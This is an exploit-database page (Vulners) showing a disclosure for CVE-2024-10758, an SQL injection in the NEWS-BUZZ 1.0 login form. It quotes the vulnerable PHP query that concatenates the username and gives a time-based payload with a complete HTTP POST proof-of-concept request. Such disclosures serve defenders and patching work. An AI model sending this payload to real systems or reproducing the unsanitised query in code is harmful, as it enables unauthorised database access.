Vulners
Lucene search
NEWS-BUZZ News Management System 1.0 - SQL Injection
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2024-10758 | 4 Nov 202406:04 | – | circl |
 | Code-Projects Content Management System SQL注入漏洞 | 4 Nov 202400:00 | – | cnnvd |
 | CVE-2024-10758 | 4 Nov 202403:31 | – | cve |
 | CVE-2024-10758 code-projects/anirbandutta9 Content Management System/News-Buzz index.php sql injection | 4 Nov 202403:31 | – | cvelist |
 | EUVD-2024-33289 | 3 Oct 202520:07 | – | euvd |
 | CVE-2024-10758 | 4 Nov 202404:15 | – | nvd |
 | CVE-2024-10758 | 4 Nov 202404:15 | – | osv |
 | 📄 NEWS-BUZZ 1.0 SQL Injection | 11 Apr 202500:00 | – | packetstorm |
 | PT-2024-16521 · Unknown +1 · Code-Projects/Anirbandutta9 Content Management System +1 | 3 Nov 202400:00 | – | ptsecurity |
 | CVE-2024-10758 | 5 Feb 202505:08 | – | redhatcve |
10
# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability
# CVE : CVE-2024-10758
## Vulnerability Description:
There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Vulnerable code section:
In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:
<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>
In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code.
## Proof of Concept (PoC):
1.Location: http://localhost/NEWS-BUZZ/index.php
2.Time-Based SQL Injection Payload: ' OR sleep(10)#
3.PoC request:
POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=
4.PoC response:
The response will come called time by using sleep() function.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.00318
SSVC